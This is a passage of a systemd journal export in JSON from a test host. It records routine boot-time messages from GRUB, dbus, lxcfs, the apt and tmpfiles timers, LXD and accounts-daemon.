"f8c33888140c415190c7d25f87c0b41e", "_SOURCE_REALTIME_TIMESTAMP" : "1615280818552346" } { "__CURSOR" : "s=d9fa7adefbe34ae1aa61d7656b4137d4;i=2ea;b=e2b08827b5804427b422c10c84f1567e;m=2a5f925;t=5bd16df69788c;x=74aecea21f3d04f8", "__REALTIME_TIMESTAMP" : "1615280818714764", "__MONOTONIC_TIMESTAMP" : "44431653", "_BOOT_ID" : "e2b08827b5804427b422c10c84f1567e", "_MACHINE_ID" : "e78d8f41d6784acabc245165b0ac7fef", "PRIORITY" : "6", "SYSLOG_FACILITY" : "3", "_UID" : "0", "_GID" : "0", "_TRANSPORT" : "stdout", "_HOSTNAME" : "test-1", "_STREAM_ID" : "147c3fcb1fd64c35bb2ad71aaf67c98f", "SYSLOG_IDENTIFIER" : "grub-common", "MESSAGE" : " * Recording successful boot for GRUB", "_PID" : "788", "_SYSTEMD_UNIT" : "grub-common.service", "_SYSTEMD_INVOCATION_ID" : "ba0792509caa4bd78d4591f02aac479a" } { "__CURSOR" : 
"s=d9fa7adefbe34ae1aa61d7656b4137d4;i=2eb;b=e2b08827b5804427b422c10c84f1567e;m=2a5f925;t=5bd16df69788c;x=af6dda4d3d12f932", "__REALTIME_TIMESTAMP" : "1615280818714764", "__MONOTONIC_TIMESTAMP" : "44431653", "_BOOT_ID" : "e2b08827b5804427b422c10c84f1567e", "_MACHINE_ID" : "e78d8f41d6784acabc245165b0ac7fef", "PRIORITY" : "6", "SYSLOG_FACILITY" : "3", "_UID" : "0", "_GID" : "0", "_TRANSPORT" : "stdout", "MESSAGE" : " ...done.", "_HOSTNAME" : "test-1", "_STREAM_ID" : "147c3fcb1fd64c35bb2ad71aaf67c98f", "SYSLOG_IDENTIFIER" : "grub-common", "_PID" : "788", "_SYSTEMD_UNIT" : "grub-common.service", "_SYSTEMD_INVOCATION_ID" : "ba0792509caa4bd78d4591f02aac479a" } { "__CURSOR" : "s=d9fa7adefbe34ae1aa61d7656b4137d4;i=2ec;b=e2b08827b5804427b422c10c84f1567e;m=2a60023;t=5bd16df697f8b;x=17aed942f3125518", "__REALTIME_TIMESTAMP" : "1615280818716555", "__MONOTONIC_TIMESTAMP" : "44433443", "_BOOT_ID" : "e2b08827b5804427b422c10c84f1567e", "_MACHINE_ID" : "e78d8f41d6784acabc245165b0ac7fef", "PRIORITY" : "6", "SYSLOG_FACILITY" : "3", "SYSLOG_IDENTIFIER" : "systemd", "_UID" : "0", "_GID" : "0", "_SELINUX_CONTEXT" : "unconfined\n", "_TRANSPORT" : "journal", "_PID" : "1", "_COMM" : "systemd", "_EXE" : "/lib/systemd/systemd", "_CMDLINE" : "/sbin/init", "_CAP_EFFECTIVE" : "3fffffffff", "_SYSTEMD_CGROUP" : "/init.scope", "_SYSTEMD_UNIT" : "init.scope", "_SYSTEMD_SLICE" : "-.slice", "CODE_FILE" : "../src/core/job.c", "CODE_LINE" : "842", "CODE_FUNC" : "job_log_status_message", "JOB_TYPE" : "start", "JOB_RESULT" : "done", "MESSAGE_ID" : "39f53479d3a045ac8e11786248231fbf", "_HOSTNAME" : "test-1", "MESSAGE" : "Started Daily apt upgrade and clean activities.", "UNIT" : "apt-daily-upgrade.timer", "INVOCATION_ID" : "a52729bb66a64f499069fb0631cf1115", "_SOURCE_REALTIME_TIMESTAMP" : "1615280817959873" } { "__CURSOR" : "s=d9fa7adefbe34ae1aa61d7656b4137d4;i=2ed;b=e2b08827b5804427b422c10c84f1567e;m=2a600ad;t=5bd16df698014;x=b194780a247cfb8e", "__REALTIME_TIMESTAMP" : "1615280818716692", 
"__MONOTONIC_TIMESTAMP" : "44433581", "_BOOT_ID" : "e2b08827b5804427b422c10c84f1567e", "_MACHINE_ID" : "e78d8f41d6784acabc245165b0ac7fef", "PRIORITY" : "6", "SYSLOG_FACILITY" : "3", "_SELINUX_CONTEXT" : "unconfined\n", "_SYSTEMD_SLICE" : "system.slice", "_TRANSPORT" : "syslog", "_HOSTNAME" : "test-1", "SYSLOG_IDENTIFIER" : "dbus-daemon", "SYSLOG_PID" : "790", "_PID" : "790", "_UID" : "103", "_GID" : "107", "_COMM" : "dbus-daemon", "_EXE" : "/usr/bin/dbus-daemon", "_CMDLINE" : "/usr/bin/dbus-daemon --system --address=systemd: --nofork --nopidfile --systemd-activation --syslog-only", "_CAP_EFFECTIVE" : "20000000", "_SYSTEMD_CGROUP" : "/system.slice/dbus.service", "_SYSTEMD_UNIT" : "dbus.service", "_SYSTEMD_INVOCATION_ID" : "ade09c21b8de4fb6a382892237c7d413", "MESSAGE" : "[system] Successfully activated service 'org.freedesktop.PolicyKit1'", "_SOURCE_REALTIME_TIMESTAMP" : "1615280818552765" } { "__CURSOR" : "s=d9fa7adefbe34ae1aa61d7656b4137d4;i=2ee;b=e2b08827b5804427b422c10c84f1567e;m=2a60192;t=5bd16df6980fa;x=d09af9eacaa4a0f4", "__REALTIME_TIMESTAMP" : "1615280818716922", "__MONOTONIC_TIMESTAMP" : "44433810", "_BOOT_ID" : "e2b08827b5804427b422c10c84f1567e", "_MACHINE_ID" : "e78d8f41d6784acabc245165b0ac7fef", "PRIORITY" : "6", "SYSLOG_FACILITY" : "3", "_UID" : "0", "_GID" : "0", "_SELINUX_CONTEXT" : "unconfined\n", "_SYSTEMD_SLICE" : "system.slice", "_CAP_EFFECTIVE" : "3fffffffff", "_TRANSPORT" : "stdout", "_HOSTNAME" : "test-1", "_STREAM_ID" : "3c20edf1c9f34d15adab2b3f4b36a654", "SYSLOG_IDENTIFIER" : "lxcfs", "MESSAGE" : "mount namespace: 5", "_PID" : "789", "_COMM" : "lxcfs", "_EXE" : "/usr/bin/lxcfs", "_CMDLINE" : "/usr/bin/lxcfs /var/lib/lxcfs/", "_SYSTEMD_CGROUP" : "/system.slice/lxcfs.service", "_SYSTEMD_UNIT" : "lxcfs.service", "_SYSTEMD_INVOCATION_ID" : "6b09b6542bb74a3aa4be9634bca4d61c" } { "__CURSOR" : "s=d9fa7adefbe34ae1aa61d7656b4137d4;i=2ef;b=e2b08827b5804427b422c10c84f1567e;m=2a60192;t=5bd16df6980fa;x=eeeec5f11f290678", "__REALTIME_TIMESTAMP" : 
"1615280818716922", "__MONOTONIC_TIMESTAMP" : "44433810", "_BOOT_ID" : "e2b08827b5804427b422c10c84f1567e", "_MACHINE_ID" : "e78d8f41d6784acabc245165b0ac7fef", "PRIORITY" : "6", "SYSLOG_FACILITY" : "3", "_UID" : "0", "_GID" : "0", "_SELINUX_CONTEXT" : "unconfined\n", "_SYSTEMD_SLICE" : "system.slice", "_CAP_EFFECTIVE" : "3fffffffff", "_TRANSPORT" : "stdout", "_HOSTNAME" : "test-1", "_STREAM_ID" : "3c20edf1c9f34d15adab2b3f4b36a654", "SYSLOG_IDENTIFIER" : "lxcfs", "_PID" : "789", "_COMM" : "lxcfs", "_EXE" : "/usr/bin/lxcfs", "_CMDLINE" : "/usr/bin/lxcfs /var/lib/lxcfs/", "_SYSTEMD_CGROUP" : "/system.slice/lxcfs.service", "_SYSTEMD_UNIT" : "lxcfs.service", "_SYSTEMD_INVOCATION_ID" : "6b09b6542bb74a3aa4be9634bca4d61c", "MESSAGE" : "hierarchies:" } { "__CURSOR" : "s=d9fa7adefbe34ae1aa61d7656b4137d4;i=2f0;b=e2b08827b5804427b422c10c84f1567e;m=2a60192;t=5bd16df6980fa;x=bc1ac33be7425c42", "__REALTIME_TIMESTAMP" : "1615280818716922", "__MONOTONIC_TIMESTAMP" : "44433810", "_BOOT_ID" : "e2b08827b5804427b422c10c84f1567e", "_MACHINE_ID" : "e78d8f41d6784acabc245165b0ac7fef", "PRIORITY" : "6", "SYSLOG_FACILITY" : "3", "_UID" : "0", "_GID" : "0", "_SELINUX_CONTEXT" : "unconfined\n", "_SYSTEMD_SLICE" : "system.slice", "_CAP_EFFECTIVE" : "3fffffffff", "_TRANSPORT" : "stdout", "_HOSTNAME" : "test-1", "_STREAM_ID" : "3c20edf1c9f34d15adab2b3f4b36a654", "SYSLOG_IDENTIFIER" : "lxcfs", "_PID" : "789", "_COMM" : "lxcfs", "_EXE" : "/usr/bin/lxcfs", "_CMDLINE" : "/usr/bin/lxcfs /var/lib/lxcfs/", "_SYSTEMD_CGROUP" : "/system.slice/lxcfs.service", "_SYSTEMD_UNIT" : "lxcfs.service", "_SYSTEMD_INVOCATION_ID" : "6b09b6542bb74a3aa4be9634bca4d61c", "MESSAGE" : " 0: fd: 6: perf_event" } { "__CURSOR" : "s=d9fa7adefbe34ae1aa61d7656b4137d4;i=2f1;b=e2b08827b5804427b422c10c84f1567e;m=2a60192;t=5bd16df6980fa;x=28537ce1469cc4b2", "__REALTIME_TIMESTAMP" : "1615280818716922", "__MONOTONIC_TIMESTAMP" : "44433810", "_BOOT_ID" : "e2b08827b5804427b422c10c84f1567e", "_MACHINE_ID" : 
"e78d8f41d6784acabc245165b0ac7fef", "PRIORITY" : "6", "SYSLOG_FACILITY" : "3", "_UID" : "0", "_GID" : "0", "_SELINUX_CONTEXT" : "unconfined\n", "_SYSTEMD_SLICE" : "system.slice", "_CAP_EFFECTIVE" : "3fffffffff", "_TRANSPORT" : "stdout", "_HOSTNAME" : "test-1", "_STREAM_ID" : "3c20edf1c9f34d15adab2b3f4b36a654", "SYSLOG_IDENTIFIER" : "lxcfs", "_PID" : "789", "_COMM" : "lxcfs", "_EXE" : "/usr/bin/lxcfs", "_CMDLINE" : "/usr/bin/lxcfs /var/lib/lxcfs/", "_SYSTEMD_CGROUP" : "/system.slice/lxcfs.service", "_SYSTEMD_UNIT" : "lxcfs.service", "_SYSTEMD_INVOCATION_ID" : "6b09b6542bb74a3aa4be9634bca4d61c", "MESSAGE" : " 1: fd: 7: pids" } { "__CURSOR" : "s=d9fa7adefbe34ae1aa61d7656b4137d4;i=2f2;b=e2b08827b5804427b422c10c84f1567e;m=2a60192;t=5bd16df6980fa;x=dd9f84cd45211f80", "__REALTIME_TIMESTAMP" : "1615280818716922", "__MONOTONIC_TIMESTAMP" : "44433810", "_BOOT_ID" : "e2b08827b5804427b422c10c84f1567e", "_MACHINE_ID" : "e78d8f41d6784acabc245165b0ac7fef", "PRIORITY" : "6", "SYSLOG_FACILITY" : "3", "_UID" : "0", "_GID" : "0", "_SELINUX_CONTEXT" : "unconfined\n", "_SYSTEMD_SLICE" : "system.slice", "_CAP_EFFECTIVE" : "3fffffffff", "_TRANSPORT" : "stdout", "_HOSTNAME" : "test-1", "_STREAM_ID" : "3c20edf1c9f34d15adab2b3f4b36a654", "SYSLOG_IDENTIFIER" : "lxcfs", "_PID" : "789", "_COMM" : "lxcfs", "_EXE" : "/usr/bin/lxcfs", "_CMDLINE" : "/usr/bin/lxcfs /var/lib/lxcfs/", "_SYSTEMD_CGROUP" : "/system.slice/lxcfs.service", "_SYSTEMD_UNIT" : "lxcfs.service", "_SYSTEMD_INVOCATION_ID" : "6b09b6542bb74a3aa4be9634bca4d61c", "MESSAGE" : " 2: fd: 8: hugetlb" } { "__CURSOR" : "s=d9fa7adefbe34ae1aa61d7656b4137d4;i=2f3;b=e2b08827b5804427b422c10c84f1567e;m=2a60192;t=5bd16df6980fa;x=c60b3b8e02b0ff6e", "__REALTIME_TIMESTAMP" : "1615280818716922", "__MONOTONIC_TIMESTAMP" : "44433810", "_BOOT_ID" : "e2b08827b5804427b422c10c84f1567e", "_MACHINE_ID" : "e78d8f41d6784acabc245165b0ac7fef", "PRIORITY" : "6", "SYSLOG_FACILITY" : "3", "_UID" : "0", "_GID" : "0", "_SELINUX_CONTEXT" : "unconfined\n", 
"_SYSTEMD_SLICE" : "system.slice", "_CAP_EFFECTIVE" : "3fffffffff", "_TRANSPORT" : "stdout", "_HOSTNAME" : "test-1", "_STREAM_ID" : "3c20edf1c9f34d15adab2b3f4b36a654", "SYSLOG_IDENTIFIER" : "lxcfs", "_PID" : "789", "_COMM" : "lxcfs", "_EXE" : "/usr/bin/lxcfs", "_CMDLINE" : "/usr/bin/lxcfs /var/lib/lxcfs/", "_SYSTEMD_CGROUP" : "/system.slice/lxcfs.service", "_SYSTEMD_UNIT" : "lxcfs.service", "_SYSTEMD_INVOCATION_ID" : "6b09b6542bb74a3aa4be9634bca4d61c", "MESSAGE" : " 3: fd: 9: freezer" } { "__CURSOR" : "s=d9fa7adefbe34ae1aa61d7656b4137d4;i=2f4;b=e2b08827b5804427b422c10c84f1567e;m=2a60192;t=5bd16df6980fa;x=e0b682b06fac3a58", "__REALTIME_TIMESTAMP" : "1615280818716922", "__MONOTONIC_TIMESTAMP" : "44433810", "_BOOT_ID" : "e2b08827b5804427b422c10c84f1567e", "_MACHINE_ID" : "e78d8f41d6784acabc245165b0ac7fef", "PRIORITY" : "6", "SYSLOG_FACILITY" : "3", "_UID" : "0", "_GID" : "0", "_SELINUX_CONTEXT" : "unconfined\n", "_SYSTEMD_SLICE" : "system.slice", "_CAP_EFFECTIVE" : "3fffffffff", "_TRANSPORT" : "stdout", "_HOSTNAME" : "test-1", "_STREAM_ID" : "3c20edf1c9f34d15adab2b3f4b36a654", "SYSLOG_IDENTIFIER" : "lxcfs", "_PID" : "789", "_COMM" : "lxcfs", "_EXE" : "/usr/bin/lxcfs", "_CMDLINE" : "/usr/bin/lxcfs /var/lib/lxcfs/", "_SYSTEMD_CGROUP" : "/system.slice/lxcfs.service", "_SYSTEMD_UNIT" : "lxcfs.service", "_SYSTEMD_INVOCATION_ID" : "6b09b6542bb74a3aa4be9634bca4d61c", "MESSAGE" : " 4: fd: 10: memory" } { "__CURSOR" : "s=d9fa7adefbe34ae1aa61d7656b4137d4;i=2f5;b=e2b08827b5804427b422c10c84f1567e;m=2a60192;t=5bd16df6980fa;x=7fef776a74e9508e", "__REALTIME_TIMESTAMP" : "1615280818716922", "__MONOTONIC_TIMESTAMP" : "44433810", "_BOOT_ID" : "e2b08827b5804427b422c10c84f1567e", "_MACHINE_ID" : "e78d8f41d6784acabc245165b0ac7fef", "PRIORITY" : "6", "SYSLOG_FACILITY" : "3", "_UID" : "0", "_GID" : "0", "_SELINUX_CONTEXT" : "unconfined\n", "_SYSTEMD_SLICE" : "system.slice", "_CAP_EFFECTIVE" : "3fffffffff", "_TRANSPORT" : "stdout", "_HOSTNAME" : "test-1", "_STREAM_ID" : 
"3c20edf1c9f34d15adab2b3f4b36a654", "SYSLOG_IDENTIFIER" : "lxcfs", "_PID" : "789", "_COMM" : "lxcfs", "_EXE" : "/usr/bin/lxcfs", "_CMDLINE" : "/usr/bin/lxcfs /var/lib/lxcfs/", "_SYSTEMD_CGROUP" : "/system.slice/lxcfs.service", "_SYSTEMD_UNIT" : "lxcfs.service", "_SYSTEMD_INVOCATION_ID" : "6b09b6542bb74a3aa4be9634bca4d61c", "MESSAGE" : " 5: fd: 11: cpu,cpuacct" } { "__CURSOR" : "s=d9fa7adefbe34ae1aa61d7656b4137d4;i=2f6;b=e2b08827b5804427b422c10c84f1567e;m=2a60192;t=5bd16df6980fa;x=20ea5d2e14d8f9bf", "__REALTIME_TIMESTAMP" : "1615280818716922", "__MONOTONIC_TIMESTAMP" : "44433810", "_BOOT_ID" : "e2b08827b5804427b422c10c84f1567e", "_MACHINE_ID" : "e78d8f41d6784acabc245165b0ac7fef", "PRIORITY" : "6", "SYSLOG_FACILITY" : "3", "_UID" : "0", "_GID" : "0", "_SELINUX_CONTEXT" : "unconfined\n", "_SYSTEMD_SLICE" : "system.slice", "_CAP_EFFECTIVE" : "3fffffffff", "_TRANSPORT" : "stdout", "_HOSTNAME" : "test-1", "_STREAM_ID" : "3c20edf1c9f34d15adab2b3f4b36a654", "SYSLOG_IDENTIFIER" : "lxcfs", "_PID" : "789", "_COMM" : "lxcfs", "_EXE" : "/usr/bin/lxcfs", "_CMDLINE" : "/usr/bin/lxcfs /var/lib/lxcfs/", "_SYSTEMD_CGROUP" : "/system.slice/lxcfs.service", "_SYSTEMD_UNIT" : "lxcfs.service", "_SYSTEMD_INVOCATION_ID" : "6b09b6542bb74a3aa4be9634bca4d61c", "MESSAGE" : " 6: fd: 12: devices" } { "__CURSOR" : "s=d9fa7adefbe34ae1aa61d7656b4137d4;i=2f7;b=e2b08827b5804427b422c10c84f1567e;m=2a60192;t=5bd16df6980fa;x=adb7445415f5f078", "__REALTIME_TIMESTAMP" : "1615280818716922", "__MONOTONIC_TIMESTAMP" : "44433810", "_BOOT_ID" : "e2b08827b5804427b422c10c84f1567e", "_MACHINE_ID" : "e78d8f41d6784acabc245165b0ac7fef", "PRIORITY" : "6", "SYSLOG_FACILITY" : "3", "_UID" : "0", "_GID" : "0", "_SELINUX_CONTEXT" : "unconfined\n", "_SYSTEMD_SLICE" : "system.slice", "_CAP_EFFECTIVE" : "3fffffffff", "_TRANSPORT" : "stdout", "_HOSTNAME" : "test-1", "_STREAM_ID" : "3c20edf1c9f34d15adab2b3f4b36a654", "SYSLOG_IDENTIFIER" : "lxcfs", "_PID" : "789", "_COMM" : "lxcfs", "_EXE" : "/usr/bin/lxcfs", "_CMDLINE" : 
"/usr/bin/lxcfs /var/lib/lxcfs/", "_SYSTEMD_CGROUP" : "/system.slice/lxcfs.service", "_SYSTEMD_UNIT" : "lxcfs.service", "_SYSTEMD_INVOCATION_ID" : "6b09b6542bb74a3aa4be9634bca4d61c", "MESSAGE" : " 7: fd: 13: net_cls,net_prio" } { "__CURSOR" : "s=d9fa7adefbe34ae1aa61d7656b4137d4;i=2f8;b=e2b08827b5804427b422c10c84f1567e;m=2a60192;t=5bd16df6980fa;x=be4fe76ac79fe950", "__REALTIME_TIMESTAMP" : "1615280818716922", "__MONOTONIC_TIMESTAMP" : "44433810", "_BOOT_ID" : "e2b08827b5804427b422c10c84f1567e", "_MACHINE_ID" : "e78d8f41d6784acabc245165b0ac7fef", "PRIORITY" : "6", "SYSLOG_FACILITY" : "3", "_UID" : "0", "_GID" : "0", "_SELINUX_CONTEXT" : "unconfined\n", "_SYSTEMD_SLICE" : "system.slice", "_CAP_EFFECTIVE" : "3fffffffff", "_TRANSPORT" : "stdout", "_HOSTNAME" : "test-1", "_STREAM_ID" : "3c20edf1c9f34d15adab2b3f4b36a654", "SYSLOG_IDENTIFIER" : "lxcfs", "_PID" : "789", "_COMM" : "lxcfs", "_EXE" : "/usr/bin/lxcfs", "_CMDLINE" : "/usr/bin/lxcfs /var/lib/lxcfs/", "_SYSTEMD_CGROUP" : "/system.slice/lxcfs.service", "_SYSTEMD_UNIT" : "lxcfs.service", "_SYSTEMD_INVOCATION_ID" : "6b09b6542bb74a3aa4be9634bca4d61c", "MESSAGE" : " 8: fd: 14: blkio" } { "__CURSOR" : "s=d9fa7adefbe34ae1aa61d7656b4137d4;i=2f9;b=e2b08827b5804427b422c10c84f1567e;m=2a60192;t=5bd16df6980fa;x=b6e830dc214e9808", "__REALTIME_TIMESTAMP" : "1615280818716922", "__MONOTONIC_TIMESTAMP" : "44433810", "_BOOT_ID" : "e2b08827b5804427b422c10c84f1567e", "_MACHINE_ID" : "e78d8f41d6784acabc245165b0ac7fef", "PRIORITY" : "6", "SYSLOG_FACILITY" : "3", "_UID" : "0", "_GID" : "0", "_SELINUX_CONTEXT" : "unconfined\n", "_SYSTEMD_SLICE" : "system.slice", "_CAP_EFFECTIVE" : "3fffffffff", "_TRANSPORT" : "stdout", "_HOSTNAME" : "test-1", "_STREAM_ID" : "3c20edf1c9f34d15adab2b3f4b36a654", "SYSLOG_IDENTIFIER" : "lxcfs", "_PID" : "789", "_COMM" : "lxcfs", "_EXE" : "/usr/bin/lxcfs", "_CMDLINE" : "/usr/bin/lxcfs /var/lib/lxcfs/", "_SYSTEMD_CGROUP" : "/system.slice/lxcfs.service", "_SYSTEMD_UNIT" : "lxcfs.service", "_SYSTEMD_INVOCATION_ID" 
: "6b09b6542bb74a3aa4be9634bca4d61c", "MESSAGE" : " 9: fd: 15: rdma" } { "__CURSOR" : "s=d9fa7adefbe34ae1aa61d7656b4137d4;i=2fa;b=e2b08827b5804427b422c10c84f1567e;m=2a60192;t=5bd16df6980fa;x=54723fbc28f831a1", "__REALTIME_TIMESTAMP" : "1615280818716922", "__MONOTONIC_TIMESTAMP" : "44433810", "_BOOT_ID" : "e2b08827b5804427b422c10c84f1567e", "_MACHINE_ID" : "e78d8f41d6784acabc245165b0ac7fef", "PRIORITY" : "6", "SYSLOG_FACILITY" : "3", "_UID" : "0", "_GID" : "0", "_SELINUX_CONTEXT" : "unconfined\n", "_SYSTEMD_SLICE" : "system.slice", "_CAP_EFFECTIVE" : "3fffffffff", "_TRANSPORT" : "stdout", "_HOSTNAME" : "test-1", "_STREAM_ID" : "3c20edf1c9f34d15adab2b3f4b36a654", "SYSLOG_IDENTIFIER" : "lxcfs", "_PID" : "789", "_COMM" : "lxcfs", "_EXE" : "/usr/bin/lxcfs", "_CMDLINE" : "/usr/bin/lxcfs /var/lib/lxcfs/", "_SYSTEMD_CGROUP" : "/system.slice/lxcfs.service", "_SYSTEMD_UNIT" : "lxcfs.service", "_SYSTEMD_INVOCATION_ID" : "6b09b6542bb74a3aa4be9634bca4d61c", "MESSAGE" : " 10: fd: 16: cpuset" } { "__CURSOR" : "s=d9fa7adefbe34ae1aa61d7656b4137d4;i=2fb;b=e2b08827b5804427b422c10c84f1567e;m=2a60192;t=5bd16df6980fa;x=4088854d132749ea", "__REALTIME_TIMESTAMP" : "1615280818716922", "__MONOTONIC_TIMESTAMP" : "44433810", "_BOOT_ID" : "e2b08827b5804427b422c10c84f1567e", "_MACHINE_ID" : "e78d8f41d6784acabc245165b0ac7fef", "PRIORITY" : "6", "SYSLOG_FACILITY" : "3", "_UID" : "0", "_GID" : "0", "_SELINUX_CONTEXT" : "unconfined\n", "_SYSTEMD_SLICE" : "system.slice", "_CAP_EFFECTIVE" : "3fffffffff", "_TRANSPORT" : "stdout", "_HOSTNAME" : "test-1", "_STREAM_ID" : "3c20edf1c9f34d15adab2b3f4b36a654", "SYSLOG_IDENTIFIER" : "lxcfs", "_PID" : "789", "_COMM" : "lxcfs", "_EXE" : "/usr/bin/lxcfs", "_CMDLINE" : "/usr/bin/lxcfs /var/lib/lxcfs/", "_SYSTEMD_CGROUP" : "/system.slice/lxcfs.service", "_SYSTEMD_UNIT" : "lxcfs.service", "_SYSTEMD_INVOCATION_ID" : "6b09b6542bb74a3aa4be9634bca4d61c", "MESSAGE" : " 11: fd: 17: name=systemd" } { "__CURSOR" : 
"s=d9fa7adefbe34ae1aa61d7656b4137d4;i=2fc;b=e2b08827b5804427b422c10c84f1567e;m=2a60192;t=5bd16df6980fa;x=47878a04061de12c", "__REALTIME_TIMESTAMP" : "1615280818716922", "__MONOTONIC_TIMESTAMP" : "44433810", "_BOOT_ID" : "e2b08827b5804427b422c10c84f1567e", "_MACHINE_ID" : "e78d8f41d6784acabc245165b0ac7fef", "PRIORITY" : "6", "SYSLOG_FACILITY" : "3", "_UID" : "0", "_GID" : "0", "_SELINUX_CONTEXT" : "unconfined\n", "_SYSTEMD_SLICE" : "system.slice", "_CAP_EFFECTIVE" : "3fffffffff", "_TRANSPORT" : "stdout", "_HOSTNAME" : "test-1", "_STREAM_ID" : "3c20edf1c9f34d15adab2b3f4b36a654", "SYSLOG_IDENTIFIER" : "lxcfs", "_PID" : "789", "_COMM" : "lxcfs", "_EXE" : "/usr/bin/lxcfs", "_CMDLINE" : "/usr/bin/lxcfs /var/lib/lxcfs/", "_SYSTEMD_CGROUP" : "/system.slice/lxcfs.service", "_SYSTEMD_UNIT" : "lxcfs.service", "_SYSTEMD_INVOCATION_ID" : "6b09b6542bb74a3aa4be9634bca4d61c", "MESSAGE" : " 12: fd: 18: unified" } { "__CURSOR" : "s=d9fa7adefbe34ae1aa61d7656b4137d4;i=2fd;b=e2b08827b5804427b422c10c84f1567e;m=2a60c68;t=5bd16df698bcf;x=1cb1f21d0102939d", "__REALTIME_TIMESTAMP" : "1615280818719695", "__MONOTONIC_TIMESTAMP" : "44436584", "_BOOT_ID" : "e2b08827b5804427b422c10c84f1567e", "_MACHINE_ID" : "e78d8f41d6784acabc245165b0ac7fef", "PRIORITY" : "6", "SYSLOG_FACILITY" : "3", "SYSLOG_IDENTIFIER" : "systemd", "_UID" : "0", "_GID" : "0", "_SELINUX_CONTEXT" : "unconfined\n", "_TRANSPORT" : "journal", "CODE_FILE" : "../src/core/unit.c", "CODE_LINE" : "1718", "CODE_FUNC" : "unit_status_log_starting_stopping_reloading", "MESSAGE_ID" : "7d4958e842da4a758f6c1cdc7b36dcc5", "_PID" : "1", "_COMM" : "systemd", "_EXE" : "/lib/systemd/systemd", "_CMDLINE" : "/sbin/init", "_CAP_EFFECTIVE" : "3fffffffff", "_SYSTEMD_CGROUP" : "/init.scope", "_SYSTEMD_UNIT" : "init.scope", "_SYSTEMD_SLICE" : "-.slice", "_HOSTNAME" : "test-1", "MESSAGE" : "Starting LXD - unix socket.", "UNIT" : "lxd.socket", "INVOCATION_ID" : "0744372decba4f1bbe6fe5d4a8841f90", "_SOURCE_REALTIME_TIMESTAMP" : "1615280817978451" } { 
"__CURSOR" : "s=d9fa7adefbe34ae1aa61d7656b4137d4;i=2fe;b=e2b08827b5804427b422c10c84f1567e;m=2a60cc8;t=5bd16df698c2f;x=fdfd154cd83f54ad", "__REALTIME_TIMESTAMP" : "1615280818719791", "__MONOTONIC_TIMESTAMP" : "44436680", "_BOOT_ID" : "e2b08827b5804427b422c10c84f1567e", "_MACHINE_ID" : "e78d8f41d6784acabc245165b0ac7fef", "PRIORITY" : "6", "SYSLOG_FACILITY" : "3", "_UID" : "0", "_GID" : "0", "_SELINUX_CONTEXT" : "unconfined\n", "_SYSTEMD_SLICE" : "system.slice", "_CAP_EFFECTIVE" : "3fffffffff", "_TRANSPORT" : "syslog", "_HOSTNAME" : "test-1", "SYSLOG_IDENTIFIER" : "accounts-daemon", "SYSLOG_PID" : "786", "MESSAGE" : "started daemon version 0.6.45", "_PID" : "786", "_COMM" : "accounts-daemon", "_EXE" : "/usr/lib/accountsservice/accounts-daemon", "_CMDLINE" : "/usr/lib/accountsservice/accounts-daemon", "_SYSTEMD_CGROUP" : "/system.slice/accounts-daemon.service", "_SYSTEMD_UNIT" : "accounts-daemon.service", "_SYSTEMD_INVOCATION_ID" : "fb8c38edec2345e7ac064ca6e9088f83", "_SOURCE_REALTIME_TIMESTAMP" : "1615280818556640" } { "__CURSOR" : "s=d9fa7adefbe34ae1aa61d7656b4137d4;i=2ff;b=e2b08827b5804427b422c10c84f1567e;m=2a60eb8;t=5bd16df698e1f;x=4332bec02ad001a9", "__REALTIME_TIMESTAMP" : "1615280818720287", "__MONOTONIC_TIMESTAMP" : "44437176", "_BOOT_ID" : "e2b08827b5804427b422c10c84f1567e", "_MACHINE_ID" : "e78d8f41d6784acabc245165b0ac7fef", "PRIORITY" : "6", "SYSLOG_FACILITY" : "3", "SYSLOG_IDENTIFIER" : "systemd", "_UID" : "0", "_GID" : "0", "_SELINUX_CONTEXT" : "unconfined\n", "_TRANSPORT" : "journal", "_PID" : "1", "_COMM" : "systemd", "_EXE" : "/lib/systemd/systemd", "_CMDLINE" : "/sbin/init", "_CAP_EFFECTIVE" : "3fffffffff", "_SYSTEMD_CGROUP" : "/init.scope", "_SYSTEMD_UNIT" : "init.scope", "_SYSTEMD_SLICE" : "-.slice", "CODE_FILE" : "../src/core/job.c", "CODE_LINE" : "842", "CODE_FUNC" : "job_log_status_message", "JOB_TYPE" : "start", "JOB_RESULT" : "done", "MESSAGE_ID" : "39f53479d3a045ac8e11786248231fbf", "_HOSTNAME" : "test-1", "MESSAGE" : "Started Daily Cleanup of 
Temporary Directories.", "UNIT" : "systemd-tmpfiles-clean.timer", "INVOCATION_ID" : "9700b3e9c7e94c8bbb5cb5eadd31c9ac", "_SOURCE_REALTIME_TIMESTAMP" : "1615280817983403" } { "__CURSOR" : "s=d9fa7adefbe34ae1aa61d7656b4137d4;i=300;b=e2b08827b5804427b422c10c84f1567e;m=2a60f56;t=5bd16df698ebe;x=2a7e2d8853f693cb", "__REALTIME_TIMESTAMP" : "1615280818720446", "__MONOTONIC_TIMESTAMP" : "44437334", "_BOOT_ID" : "e2b08827b5804427b422c10c84f1567e", "_MACHINE_ID" : "e78d8f41d6784acabc245165b0ac7fef", "PRIORITY" : "6", "SYSLOG_FACILITY" : "3", "_SELINUX_CONTEXT" : "unconfined\n", "_SYSTEMD_SLICE" : "system.slice", "_TRANSPORT" : "syslog", "_HOSTNAME" : "test-1", "SYSLOG_IDENTIFIER" : "dbus-daemon", "SYSLOG_PID" : "790", "_PID" : "790", "_UID" : "103", "_GID" : "107", "_COMM" : "dbus-daemon", "_EXE" : "/usr/bin/dbus-daemon", "_CMDLINE" : "/usr/bin/dbus-daemon --system --address=systemd: --nofork --nopidfile --systemd-activation --syslog-only", "_CAP_EFFECTIVE" : "20000000", "_SYSTEMD_CGROUP" : "/system.slice/dbus.service", "_SYSTEMD_UNIT" : "dbus.service", "_SYSTEMD_INVOCATION_ID" : "ade09c21b8de4fb6a382892237c7d413", "MESSAGE" : "[system] Successfully activated service 'org.freedesktop.hostname1'", "_SOURCE_REALTIME_TIMESTAMP" : "1615280818634485" } { "__CURSOR" : "s=d9fa7adefbe34ae1aa61d7656b4137d4;i=301;b=e2b08827b5804427b422c10c84f1567e;m=2a610a1;t=5bd16df699009;x=34d30000e7628ab", "__REALTIME_TIMESTAMP" : "1615280818720777", "__MONOTONIC_TIMESTAMP" : "44437665", "_BOOT_ID" : "e2b08827b5804427b422c10c84f1567e", "_MACHINE_ID" : "e78d8f41d6784acabc245165b0ac7fef", "PRIORITY" : "6", "SYSLOG_FACILITY" : "3", "SYSLOG_IDENTIFIER" : "systemd", "_UID" : "0", "_GID" : "0", "_SELINUX_CONTEXT" : "unconfined\n", 